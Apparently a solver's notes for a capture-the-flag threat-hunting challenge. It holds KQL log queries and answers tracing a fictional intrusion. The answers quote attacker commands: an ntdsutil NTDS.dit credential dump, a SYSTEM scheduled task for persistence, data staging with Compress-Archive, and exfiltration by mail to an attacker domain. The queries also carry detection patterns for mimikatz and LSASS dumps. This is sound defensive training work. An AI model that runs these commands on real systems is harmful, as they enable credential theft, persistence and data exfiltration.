CJ Walker Ghost

The document details a cybersecurity incident involving threat actors who exfiltrated data related to a secret energy program. Key findings include the use of specific commands for data compression and exfiltration, the number of compromised accounts, and the identification of affected machines. The document also highlights the timeline of events and the usernames associated with compromised accounts.

Uploaded by

bmant794

Ghost In The Wire

Q1

⚠️Warning⚠️: This section is REALLY HARD! Try Rage in the Apocalypse first for a more reasonable experience

The threat actors exfiltrated data about your secret energy program.

Under what filename did they stage the exfiltration data?

Ans

reg add HKLM\SOFTWARE\Policies\Microsoft\FVE /v RecoveryKeyMessage /t REG_SZ /d "+-+-+- Your drives are Encrypted! Contact us immediately: killmonger@onionmail.org -+-+-+" /f
XOGC-DESKTOP

WIP

let _apt_emails =
Email
| where sender in ("org@yandex.com","org_competition@yandex.com")
| distinct reply_to;
let _apt_emls =
Email
| where sender in (_apt_emails) or reply_to in (_apt_emails)
| distinct recipient;
let _apt_host =
Employees
| where email_addr in (_apt_emls)
| distinct hostname;
ProcessEvents
| where hostname in (_apt_host)
| where process_name has "powershell"

RVFR-MACHINE

let _apt_emails =
Email
| where sender in ("org@yandex.com","org_competition@yandex.com")
| distinct reply_to;
let _apt_emls =
Email
| where sender in (_apt_emails) or reply_to in (_apt_emails)
| distinct recipient;
//let _apt_host =
let _apt_hostname =
Employees
| where email_addr in (_apt_emls)
| distinct hostname;
ProcessEvents
| where hostname in (_apt_hostname)
| where process_name has "powershell"
| where timestamp between (datetime('2323-07-26T11:47:24Z') .. datetime_add('hour', 2, datetime('2323-07-26T11:47:24Z')))

Email
| where timestamp between (datetime('2323-07-26T11:47:24Z') .. datetime_add('hour', 2, datetime('2323-07-26T11:47:24Z')))

let _ransomed_hosts=
FileCreationEvents
| where filename has "unlock_your_files.txt"
| distinct hostname;
let _start_time = toscalar(
FileCreationEvents
| where filename has "unlock_your_files.txt"
| summarize first_time = min(timestamp));
let _end_time = toscalar(
FileCreationEvents
| where filename has "unlock_your_files.txt"
| summarize last_time = max(timestamp));
ProcessEvents
| where hostname in (_ransomed_hosts)
| where timestamp >= _start_time
| order by hostname , timestamp asc
| project timestamp, process_commandline, process_name, hostname
//| where process_commandline has_any("exfil", ".zip", ".rar", ".dmp", "lsass", "ntds.dit", ".txt")
//| extend FileName = extract(@"[a-zA-Z]:\\[^ ]+?\.(txt|zip|rar|dmp|dit)", 0, process_commandline)
//| where isnotempty(FileName) // Only keep rows with extracted filenames
| extend FileName = extract(@"[a-zA-Z]:\\[^ ]+?\.[a-zA-Z0-9]{1,10}", 0, process_commandline)
| where isnotempty(FileName) or process_commandline has_any("exfil", "Temp", "Invoke-RestMethod", "http://", "survival-news.net", "hire.xyz")
| where process_commandline !contains "setup.bat"
| distinct process_commandline

Q1

The threat actors exfiltrated data about your secret energy program.

Under what filename did they stage the exfiltration data?

Ans

Compress-Archive -Path "C:\ScooterEnergyResearch" -DestinationPath "C:\ScooterEnergyResearch.zip" -Force

ProcessEvents
| where process_commandline contains "powershell"
| distinct process_commandline

ProcessEvents
| where process_commandline contains "powershell"
| where process_commandline contains "Q29tcHJl"
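The Q1 hunt above matches the literal "Q29tcHJl" because that is the base64 of "Compre" when the cmdlet name starts on a 3-byte boundary. The Python below is an added example, not part of the original notes: it derives that search string for all three byte alignments and decodes base64 runs found in command lines to surface staging cmdlets. The sample events are constructed, and the challenge's base64-of-UTF-8 encoding is contrasted with the UTF-16LE that a real PowerShell -EncodedCommand carries.

```python
import base64
import binascii
import re
# Constructed sample telemetry modelled on this challenge, not real ProcessEvents rows.
STAGING_CMD = ('Compress-Archive -Path "C:\\ScooterEnergyResearch" '
               '-DestinationPath "C:\\ScooterEnergyResearch.zip" -Force')
STAGING_CMDLETS = ("Compress-Archive", "Send-MailMessage", "Copy-Item")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def b64_utf8(text: str) -> str:      # the encoding the challenge data used
    return base64.b64encode(text.encode("utf-8")).decode("ascii")
def b64_utf16le(text: str) -> str:   # what PowerShell -EncodedCommand really takes
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    "powershell.exe -enc " + b64_utf8(STAGING_CMD),
    "powershell.exe -EncodedCommand " + b64_utf16le("Get-Date"),  # benign
    "cmd.exe /c whoami",
]

def base64_variants(keyword: str) -> list[str]:
    """Base64 substrings matching `keyword` at each of the three byte alignments,
    so a substring hunt does not depend on where the keyword sits in the blob.
    Index 0 is the aligned form, e.g. "Compre" -> "Q29tcHJl"."""
    variants = []
    for pad in range(3):
        enc = base64.b64encode(b"x" * pad + keyword.encode()).decode().rstrip("=")
        start = (0, 2, 3)[pad]  # leading chars mix in pad bytes; last char may mix the next byte
        end = len(enc) if (pad + len(keyword)) % 3 == 0 else len(enc) - 1
        variants.append(enc[start:end])
    return variants

def decode_runs(cmdline: str) -> list[str]:
    """Decode every long base64 run; a zero byte in every odd position means
    UTF-16LE (a real -EncodedCommand), otherwise the payload is tried as UTF-8."""
    out = []
    for m in B64_RUN.finditer(cmdline):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
            is_utf16 = len(raw) % 2 == 0 and not any(raw[1::2])
            out.append(raw.decode("utf-16-le" if is_utf16 else "utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64 after all, or a binary payload
    return out

def find_staging(events: list[str]) -> list[tuple[str, str]]:
    """(command line, decoded payload) for events whose payload uses a staging cmdlet."""
    return [(cmd, dec) for cmd in events for dec in decode_runs(cmd)
            if any(c in dec for c in STAGING_CMDLETS)]
```

Searching all three variants rather than only "Q29tcHJl" also catches the cmdlet when it is not the first token of the encoded script.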

Q2
How many machines (hosts) did the actors exfiltrate data from?

Ans
4

Q3

What command did the threat actor use to gather the data to be exfiltrated?

Ans

Get-ChildItem -Recurse -Force -ErrorAction SilentlyContinue -Filter *.docx,*.ppt,*.pdf,*.xlsx | ForEach-Object {Copy-Item $_.FullName "C:\ScooterEnergyResearch"}

let _exfil_host =
ProcessEvents
| where process_commandline contains "powershell"
| where process_commandline contains "Q29tcHJl"
| distinct hostname;
ProcessEvents
| where hostname in (_exfil_host)
| where timestamp between (datetime(2323-07-30T14:32:24Z) .. datetime_add('hour', 1, datetime(2323-07-30T14:32:24Z)))

Q4

During the staging process, what command did the threat actor use to compress the
exfiltrated data?

Ans

Compress-Archive -Path "C:\ScooterEnergyResearch" -DestinationPath "C:\ScooterEnergyResearch.zip" -Force

Q5

The threat actors used a command to exfiltrate the data using a common service.

What was the subject?

Send-MailMessage -From "isthisyourking@survival-news.net" -To "isthisyourking@survival-news.net" -Subject "Game Set Match" -Body "See attached for goodies" -Attachments "C:\ScooterEnergyResearch.zip"

Q6

What command did the operators use to establish persistence on their victims?

Ans

schtasks /create /sc hourly /tn "IsThisYourKing" /tr "C:\\Windows\\Temp\\ggwp.exe" /ru SYSTEM

let _exfil_host =
ProcessEvents
| where process_commandline contains "powershell"
| where process_commandline contains "Q29tcHJl"
| distinct hostname;
ProcessEvents
| where hostname in (_exfil_host)
| where timestamp between (datetime(2323-07-30T14:32:24Z) .. datetime_add('hour', 24, datetime(2323-07-30T14:32:24Z)))
| distinct process_commandline

Q7

What command did they use to acquire most of the credentials?

Ans

ntdsutil "ac i ntds "ifm" "create full C:\Windows\Temp\Ntds_dit" q q

ProcessEvents
| where username == "teberry_domain_admin"

let _exfil_host =
ProcessEvents
| where process_commandline contains "powershell"
| where process_commandline contains "Q29tcHJl"
| distinct hostname;
ProcessEvents
| where hostname in (_exfil_host)
| where timestamp between (datetime(2323-07-30T14:32:24Z) .. datetime_add('hour', 24, datetime(2323-07-30T14:32:24Z)))
| distinct process_commandline

let _ransomed_hosts=
FileCreationEvents
| where filename has "unlock_your_files.txt"
| distinct hostname;

let _affected_hosts =
ProcessEvents
| where process_commandline contains "schtasks /create /sc hourly /tn \"IsThisYourKing\""
| distinct hostname;
ProcessEvents
//| where timestamp >= datetime(2323-07-26T11:47:24Z)
//| where hostname in (_affected_hosts)
| where process_commandline has_any ("procdump", "rundll32.exe", "comsvcs.dll", "ntdsutil", "mimikatz", "reg save", "sam", "security", "system")
or process_name in ("procdump.exe", "mimikatz.exe", "rundll32.exe", "ntdsutil.exe", "reg.exe")
| where process_commandline !has "--system-initiated"
// process_name must still be a column here, so the distinct comes after the filters
| where
// 1. WDigest Registry Modification
(process_name == "reg.exe"
and process_commandline has_any ("add", "HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest", "UseLogonCredential", "/d 1"))
// 2. LSASS Dump with rundll32 and comsvcs.dll
or (process_name == "rundll32.exe"
and process_commandline has_any ("comsvcs.dll", "MiniDump")
and process_commandline has_any (".dmp", "ssasl", "lsass")) // Look for dump files or reversed "lsass"
// 3. New User Creation (DefaultAccount)
or (process_name == "net.exe"
and process_commandline has_any ("user", "DefaultAccount", "/add"))
// 4. SAM Hive Dump
or (process_name == "reg.exe"
and process_commandline has_any ("save", "HKLM\\SAM"))
// 5. PowerShell Mimikatz Download (optional, less common)
or (process_name == "powershell.exe"
and process_commandline has_any ("IEX", "Invoke-Mimikatz", "DownloadString"))
or process_commandline has_any ("procdump", "comsvcs", "taskmgr", "ntdsutil", "mimikatz", "reg save", "reg", "save")
| distinct process_commandline

Q8

But first, they had to compromise a crucial account.

What was the username linked to that account?

Ans

teberry_domain_admin DOMAIN_CONTROLLER_01 2323-07-30T14:46:26Z

AuthenticationEvents
| where result == "Successful Login"
| extend type = tostring(split(hostname, '-')[-1])
| where type has "DOMAIN_CONTROLLER_01"

Q9

They compromised the account in question 8 via another compromised user.

What is their username?

Ans

jodrahota XCMX-MACHINE 10.10.2.180

OAMX-MACHINE

let _comp_hsts =
AuthenticationEvents
| where username == "teberry_domain_admin"
| distinct hostname;
Employees
| where hostname in (_comp_hsts)

Q10

When did the threat actor compromise the account in question 8?

Ans

2323-07-30T15:29:43Z

ProcessEvents
| where username == "teberry_domain_admin"

Q12

Using this initial access vector, how many accounts did the actors target?

Ans
718

let _emp_agent =
Employees
| where username == "biharrell"
| distinct user_agent;
let _apt_agent=
AuthenticationEvents
| where username == "biharrell"
| where user_agent !in (_emp_agent)
| where result == "Successful Login"
| distinct user_agent;
AuthenticationEvents
| where user_agent in (_apt_agent)
//| where result == "Successful Login"
| distinct username

Q13
How many accounts did the actors compromise?

Ans

46

let _emp_agent =
Employees
| where username == "biharrell"
| distinct user_agent;
let _apt_agent=
AuthenticationEvents
| where username == "biharrell"
| where user_agent !in (_emp_agent)
| where result == "Successful Login"
| distinct user_agent;
AuthenticationEvents
| where user_agent in (_apt_agent)
| where result == "Successful Login"
| distinct username

Q14

The threat actor leveraged a machine they had already compromised to use the
"crucial" credentials. Which user did this machine belong to? (Provide their
username.)

Ans
biharrell

let _comp_hsts =
AuthenticationEvents
| where username == "teberry_domain_admin"
| distinct src_ip;
Employees
| where ip_addr in (_comp_hsts)

Q15
When did the threat actor compromise the account of the user identified in question
14?

Ans

2323-06-22T11:33:58Z

let _emp_agent =
Employees
| where username == "biharrell"
| distinct user_agent;
AuthenticationEvents
| where username == "biharrell"
| where user_agent !in (_emp_agent)
